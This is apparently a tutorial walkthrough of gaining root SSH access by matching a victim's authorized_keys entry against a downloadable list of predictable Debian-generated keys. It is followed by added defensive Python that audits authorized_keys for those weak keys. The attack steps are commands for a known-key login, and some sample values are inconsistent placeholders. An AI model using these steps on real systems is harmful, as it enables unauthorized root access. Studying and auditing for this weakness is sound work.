For this method to work, you need the authorized_keys file from the victim machine:
cat authorized_keys
ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTs................................
ssh-dss is disabled in newer versions of SSH, so you need to enable it by adding the following line to the client configuration:
nano /etc/ssh/ssh_config
PubkeyAcceptedKeyTypes +ssh-dss
git clone https://github.com/g0tmi1k/debian-ssh
tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
cd dsa/1024
Copy the first few characters of the key from authorized_keys and search for them in the list of keys we downloaded earlier:
grep -lr 'AAAAB3Ndskkdsjhfodsi4m5adsa6d5s8RadSsdsWassd3rhf6gySd2sdS34rW'
You will see a matching .pub file with a random-looking name, e.g. e2eb2172a62d0d7e40f210g6167f65ca-12345.pub
But what we need is not the public key; we need the private key to log in :)
So search again, this time by file name:
ls -la | grep e2eb2172a62d0
Now you can see two files: one private key and one public key.
Use the private key e2eb2172a62d0d7e40f210g6167f65ca-12345 to log in with ssh:
chmod 400 e2eb2172a62d0d7e40f210g6167f65ca-12345
ssh -i e2eb2172a62d0d7e40f210g6167f65ca-12345 root@IP_Address
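From the defender's side, the same key list can be used to audit authorized_keys files for these known-weak keys so they can be removed and replaced. The Python code below is an added example, not part of the original post; it assumes the archive's file names are the key's MD5 fingerprint followed by -<pid>, and the key blobs and directory used in demo() are constructed sample data.

```python
import base64
import hashlib
import os
import re
import tempfile

# Key type followed by its base64 blob; authorized_keys options before it are skipped.
KEY_RE = re.compile(r"(?:^|\s)(ssh-dss|ssh-rsa)\s+([A-Za-z0-9+/]+=*)")

def md5_fingerprint(b64_blob):
    """Legacy MD5 fingerprint (hex, no colons) of a base64 public-key blob."""
    return hashlib.md5(base64.b64decode(b64_blob)).hexdigest()

def load_weak_fingerprints(key_dir):
    """Fingerprints taken from file names of the form <md5>-<pid>[.pub] (assumed layout)."""
    names = (re.fullmatch(r"([0-9a-f]{32})-\d+(\.pub)?", n) for n in os.listdir(key_dir))
    return {m.group(1) for m in names if m}

def audit_authorized_keys(text, weak):
    """Return (line_number, key_type, fingerprint) for every blocklisted key."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = KEY_RE.search(line)
        if not m or line.lstrip().startswith("#"):
            continue
        try:
            fp = md5_fingerprint(m.group(2))
        except ValueError:  # malformed base64, not a usable key
            continue
        if fp in weak:
            hits.append((lineno, m.group(1), fp))
    return hits

def demo():
    # Constructed sample data: two fake key blobs, one of them placed on the blocklist.
    weak_blob = base64.b64encode(b"\x00\x00\x00\x07ssh-dss" + b"W" * 40).decode()
    good_blob = base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + b"G" * 40).decode()
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, md5_fingerprint(weak_blob) + "-12345.pub"), "w").close()
        weak = load_weak_fingerprints(d)
    sample = (f"# constructed authorized_keys\nssh-rsa {good_blob} admin@host\n"
              f'from="10.0.0.1" ssh-dss {weak_blob} root@old\n')
    return audit_authorized_keys(sample, weak)

if __name__ == "__main__":
    print(demo())
```

Any line this reports should be removed from authorized_keys and the key pair regenerated on a patched system.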